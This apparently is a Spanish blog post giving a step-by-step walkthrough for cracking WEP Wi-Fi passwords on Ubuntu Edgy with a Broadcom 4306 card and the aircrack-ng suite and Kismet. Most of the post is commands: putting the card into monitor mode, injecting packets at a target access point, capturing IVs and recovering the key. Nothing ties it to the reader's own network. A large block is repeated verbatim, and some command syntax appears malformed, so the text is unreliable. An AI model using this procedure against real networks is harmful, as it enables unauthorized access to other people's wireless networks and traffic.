(K,X)Ubuntu 6.10 Edgy utiliza el kernel 2.6.17 con soporte completo del modulo bcm43xx, el cual con el chip 4306, sirve para inyectar y monitorizar paquetes. Es importante hacer que funcione con este modulo, porque con Ndiwrapper no sirve.
Howto, para configurar el chip 4306 con el modulo bcm43xx:
https://help.ubuntu.com/community/WifiDocs/Driver/bcm43xx/Edgy
Ademas las versiones de Kismet y Aircrack-ng son compatibles con este modulo.
Una vez configurado el WIFI, tenemos que instalar la Suite Airckarck-ng y Kismet
sudo apt-get install aircrack-ng kismet
Debemos configurar Kismet para que funcione con bcm43xx, editaremos el archivo /etc/kismet/kismet.conf , buscaremos la linea source=none,none,none y la dejaremos así source=bcm43xx,eth1,broadcom .
Ahora que tenemos las herramientas, solo me queda aclarar unas cosas:
¿ESSID?: Es el nombre o identificador de las redes wifi
¿BSSID?: Es la dirección MAC de los puntos de acceso o routers inalámbricos
¿Cuantos paquetes necesito capturar?: Depende de la longitud de la clave WEP
<= 128 bits recomendables al menos 300.000 aunque yo espere hasta los 560.000 >= 128 bits a partir de 1.000.000
¿Donde veo los paquetes que llevo capturados?: En la consola que esta airodump-ng ejecutándose en la columna # Data
OK, comencemos:
0.1 -Paramos la tarjeta
sudo ifconfig eth1 down
0.2 -Establecemos a 1 M/s el ancho de banda, para tener muy buena visión y mucha distancia de alcance
sudo iwconfig eth1 rate 1M
1 -Ponemos la tarjeta en modo monitor
sudo airmon-ng eth1 start
1.1 -Hacemos un escaneo de redes en modo monitor y obtenemos ESSID, BSSID y el canal de la red que estamos probando, y terminamos de preparar la tarjeta.
sudo kismet
-Ahora abriremos dos consolas una para aireplay-ng y otra para airdodump-ng
2 -Comenzamos a inyectar paquetes
sudo aireplay-ng -CANAL -b BSSID -h DIRECCION-MAC-DE-bcm43xx eth1
3- Comenzamos a capturar paquetes IVs
sudo airodump-ng --ivs -c CANAL -w ESSID eth1
Una vez que tengamos la cantidad de paquetes deseados paramos aireplay-ng y airodump-ng y seguimos con el ultimo paso.
4- Obtenemos la clave
sudo aircrack-ng ESSID-01.ivs
Howto, para configurar el chip 4306 con el modulo bcm43xx:
https://help.ubuntu.com/community/WifiDocs/Driver/bcm43xx/Edgy
Ademas las versiones de Kismet y Aircrack-ng son compatibles con este modulo.
Una vez configurado el WIFI, tenemos que instalar la Suite Airckarck-ng y Kismet
sudo apt-get install aircrack-ng kismet
Debemos configurar Kismet para que funcione con bcm43xx, editaremos el archivo /etc/kismet/kismet.conf , buscaremos la linea source=none,none,none y la dejaremos así source=bcm43xx,eth1,broadcom .
Ahora que tenemos las herramientas, solo me queda aclarar unas cosas:
¿ESSID?: Es el nombre o identificador de las redes wifi
¿BSSID?: Es la dirección MAC de los puntos de acceso o routers inalámbricos
¿Cuantos paquetes necesito capturar?: Depende de la longitud de la clave WEP
<= 128 bits recomendables al menos 300.000 aunque yo espere hasta los 560.000 >= 128 bits a partir de 1.000.000
¿Donde veo los paquetes que llevo capturados?: En la consola que esta airodump-ng ejecutándose en la columna # Data
OK, comencemos:
0.1 -Paramos la tarjeta
sudo ifconfig eth1 down
0.2 -Establecemos a 1 M/s el ancho de banda, para tener muy buena visión y mucha distancia de alcance
sudo iwconfig eth1 rate 1M
1 -Ponemos la tarjeta en modo monitor
sudo airmon-ng eth1 start
1.1 -Hacemos un escaneo de redes en modo monitor y obtenemos ESSID, BSSID y el canal de la red que estamos probando, y terminamos de preparar la tarjeta.
sudo kismet
-Ahora abriremos dos consolas una para aireplay-ng y otra para airdodump-ng
2 -Comenzamos a inyectar paquetes
sudo aireplay-ng -CANAL -b BSSID -h DIRECCION-MAC-DE-bcm43xx eth1
3- Comenzamos a capturar paquetes IVs
sudo airodump-ng --ivs -c CANAL -w ESSID eth1
Una vez que tengamos la cantidad de paquetes deseados paramos aireplay-ng y airodump-ng y seguimos con el ultimo paso.
4- Obtenemos la clave
sudo aircrack-ng ESSID-01.ivs
Este proceso no deberia llevar mas de 1 o 2 minutos. En caso de que no saque la contraseña sera necesario capturar mas paquetes
No hay comentarios:
Publicar un comentario